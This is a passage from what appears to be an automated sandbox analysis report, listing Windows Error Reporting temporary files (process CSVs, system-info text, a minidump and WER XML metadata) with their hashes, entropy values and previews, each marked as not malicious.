                                                                                                                                                                    SHA-512:397A9EB043D1DD26F3F0095EE6B02C23523B212BAC906121E9E1B2E2D3B9768F9DD97FC45D6CB50B345CC6CB37F44EF632376486ABBCB3FE4475E7752983E2FB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBA6F.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.688668723935612
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWkjw6rKYqYxWQHqYEZmDtFiwI7vFiwmbvNjalesM79AIIab3:2ZDLNiDpalesM79Avab3
                                                                                                                                                                    MD5:5C15AE7427F8A617E0CF124CC1F17AA3
                                                                                                                                                                    SHA1:E70AB69B28DD207DF6BB74C39850EF0D6990A811
                                                                                                                                                                    SHA-256:8C4CCF0627A42BF7191D4CD5A18D17791C447C4DB142AC2479F3105AAC223DB1
                                                                                                                                                                    SHA-512:71642391E13FBE144ED7BA4ED6B3AFB49A0BC7BDBE2E1164FED5B4BA74D81535341AC62F86AD3FC1E4EA805E19C39095DC612BC7CA93D51942475B4A8D9837F1
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBB15.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):93630
                                                                                                                                                                    Entropy (8bit):3.0523278590212914
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:jn7NmhQq8LDs2RGgdWaZHody80n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+0+k:jn7NmhQq8LDs2RGgdWaZHow80n+sI+Ed
                                                                                                                                                                    MD5:36467DD96DFB60DB88927BF97E2A1CC3
                                                                                                                                                                    SHA1:979A7A563FCB50FF82BD246ECD3FC959EA83B178
                                                                                                                                                                    SHA-256:901FEB2DA110E9ECFB0CABDDA61B8819BC2F4E06967F66787E04E7182AAB03DB
                                                                                                                                                                    SHA-512:F73108178699EF58B5FC6FD655D5403FBAD1CFB22B2D8A07DB6218FF545EDFDB79614CE52830626975551FB56824ADC6C1DE5D77B049CD0A6F5D57CE092E2EED
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBE2.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.6984238547326744
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWIhe9qRYrYl5THkCYEZQ0TtFiXz7KFnjwNquxAapHGGIMqkGAIT2Gx:2ZDAMERB5apHG5MqkGXT2Gx
                                                                                                                                                                    MD5:A8198E15CCC589CCE36842B190E2B672
                                                                                                                                                                    SHA1:F57065149831B085599688AD1CFDAE350506066F
                                                                                                                                                                    SHA-256:6E875D6CADE71EA86DBAD4F39D625F8F94DD62BB8465F30904D1FC5EEC2C5CD5
                                                                                                                                                                    SHA-512:C973743E39E9710A59D84050965D0334B1F07E0BF297061AD4417E49A5EB623FF4F92C4555BC3FF90EDCF3A7811A6E44B8632FAA2E02016B0D0F295E725FDA6A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD5A.tmp.dmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:Mini DuMP crash report, 14 streams, Thu Feb 8 18:09:09 2024, 0x1205a4 type
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):31942
                                                                                                                                                                    Entropy (8bit):2.041017705628601
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:xgInZ0XaO5QU5UL9RHbi7TonmrKlp0iZn6QnEmXwUUO:2In8cbivon1p0iTEpS
                                                                                                                                                                    MD5:666C640E0D686D3800C7BD3F5204E370
                                                                                                                                                                    SHA1:8454DCB32F248DFC2A07FCB617CD5918CC613F03
                                                                                                                                                                    SHA-256:64D88666A6709B4F53146ED5B73F557F91720ED2B59AFE56126688656B22C011
                                                                                                                                                                    SHA-512:58FEAA4BCED6C3ACCEBBA65C802DB353EE7C4BAC1B8EBFE71D2406163FCEA2B2ECC43BE99217CB0CA6B8BE4D9CC162E7D35D0740BC9B22749A54A1F8610CF19B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MDMP..a..... ..........e........................t...........................T.......8...........T...........H...~n......................................................................................................eJ..............GenuineIntel............T..............e............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC104.tmp.WERInternalMetadata.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):8350
                                                                                                                                                                    Entropy (8bit):3.7013950846948385
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:R6l79RJVZ6xc6YwKSUf4gNgmfkccpD389btlsffPm:R6lXJr6a6YtSUf4YgmfkcZt+fW
                                                                                                                                                                    MD5:AFE4FF4AB6044E66928C2A0396804402
                                                                                                                                                                    SHA1:7E4D54E71481A4A841747AEA4EAF0346F1BB69C8
                                                                                                                                                                    SHA-256:C1AC4C30530ACCA843B8208613A0E23DB71DF5BF885AD4FBB22A11426AB4E0F1
                                                                                                                                                                    SHA-512:81B35AD945501C7B11CBD68FB69D38209721AC7EA8D5ABDFA8F3DD34B89BEBD5DD44D156DD4794C3926839E699B97085BC5F608F5F760EE0F947E1AD2A5FD115
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...3.4.4.8...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.3.4.4.8.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.0.0.0.<./.P.i.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC144.tmp.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):4601
                                                                                                                                                                    Entropy (8bit):4.488748500006893
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:cvIwr7SGl8zshJgkZ7aI9FSWpW8VYAYm8M4Jn4kDoOqFf+q8Dk6TORIQNiJtWPtH:uIafzh7Pz7VoJn4kETqkIeIQAJtWPtpd
                                                                                                                                                                    MD5:98EEA08B56431EBDD71ADFD3ACDDDE25
                                                                                                                                                                    SHA1:FA71F762F497130DE4FD2544116EBF87B1B3FAF5
                                                                                                                                                                    SHA-256:2530A66A555869A1EC018C7F4EA4EEE973B57B65ED1F3C2298FF1E0D43862952
                                                                                                                                                                    SHA-512:CE241CC8DBFAAFE402A45A89EF17941982EDEDBA690D74D161D41BA6FFD7965EFAE58C841061B381BDFE883A577DD2E72068BE81FB28416E7B7A7297AA195EA3
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="3448" />.. <arg nm="verqfe" val="3448" />.. <arg nm="csdbld" val="3448" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222528661" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC153.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):92892
                                                                                                                                                                    Entropy (8bit):3.0486975140940906
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:kvUpT33iKedWE4tPc6wk+XJ4VwYrzTZgMktX0n+sI+E+o+1+o+r+PI+GZk+B6+Zb:kvUpT33iKedWE4tPc6wk+XJ4VwYrzTZe
                                                                                                                                                                    MD5:01F6DB969C0CF228439023C31146EC4B
                                                                                                                                                                    SHA1:8A6752F3872CBCCC9919B0F33B4E44A6E41C7C89
                                                                                                                                                                    SHA-256:00CD25F23EF5FBCE41C84B79BF48B2B5A4B5A944EF8C400C4B1547A9FC644B64
                                                                                                                                                                    SHA-512:8F6580E6E1E54DC3D0964B674FC4F5F75E377650FA36C509A22E4F9B98C3E88C94B6FBDB608C814545D830E150969ECB3D001D8EE98BCC14299F5653ACDF7FF2
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC24E.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):13340
                                                                                                                                                                    Entropy (8bit):2.684054589595291
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:TiZYWakPNrqKYVYPWaHYYEZL6tFicVCgpwmqBak/LMkfsI70Lf3:2ZDFShA6ak/LMkfrQr3
                                                                                                                                                                    MD5:F1C34C8C42BFF0E84B4E5E1BF7B65FF7
                                                                                                                                                                    SHA1:F817425F0C8FE36232773C695F0CF24075B0ADBB
                                                                                                                                                                    SHA-256:A55DAB7C91682177FB307845DD640AEAA7983BCBF0D9DB44906F5F65B4CC78DC
                                                                                                                                                                    SHA-512:F7BBB49C119617AE81C8829195C7352EBAC20321C41299B9F3A9AC5FECCDA2EF749295E8F411DF85FF66BC8070EBFD323FA55EF08724F819EC1A14A8DD548D61
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC430.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):94428
                                                                                                                                                                    Entropy (8bit):3.051329890525605
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:wDFPdmhuq8LDw2RFc8UGaVHody80n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+Y:wDFPdmhuq8LDw2RFc8UGaVHow80n+sIZ
                                                                                                                                                                    MD5:8C12B026DA3FBEA8E1F8C79A3FE46CA0
                                                                                                                                                                    SHA1:26AE938E5EF0871E58F2087737562ED569653831
                                                                                                                                                                    SHA-256:5D35E115E41EE4BDF3FB45C223F5E93B588676173F91195000A309876B62351F
                                                                                                                                                                    SHA-512:6B8FF1214051970C5C1493543D1E59C4AFDC67D57F02F50A0B0E25FE2B223D03D691AAE38098725DF90FE5F523406E7E09B0B1F3B00F4CF19C74202108F52A64
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC491.tmp.csv

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):90492
                                                                                                                                                                    Entropy (8bit):3.0554460333337423
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:+bg8QKw8hdmUpg0b+SxujOijviS0n+sI+E+o+1+o+r+I+0+mE+M9+b+J+g+6+H+a:+bg8QKw8hdmUpg0b+SxujOijKS0n+sI/
                                                                                                                                                                    MD5:762BBFA52A73DAE18256922E96C809CE
                                                                                                                                                                    SHA1:17884FE120A3A05DE325BA7E058E4416B942776C
                                                                                                                                                                    SHA-256:414DA48F3FF0FB1EEFF0990C4FD75411C3924D5450CECC804812F0F938D60626
                                                                                                                                                                    SHA-512:F2BFB6F41F5F509879FB150E86D9A9332A05A574E94C7D42CA2E6A06D77C50FE3E331B02A3FEE25D7E54BAAA799ECA87DAB2C4EA985E49DE8FA752A5BC38F6B7
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                    C:\ProgramData\Microsoft\Windows\WER\Temp\WERC55D.tmp.txt

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
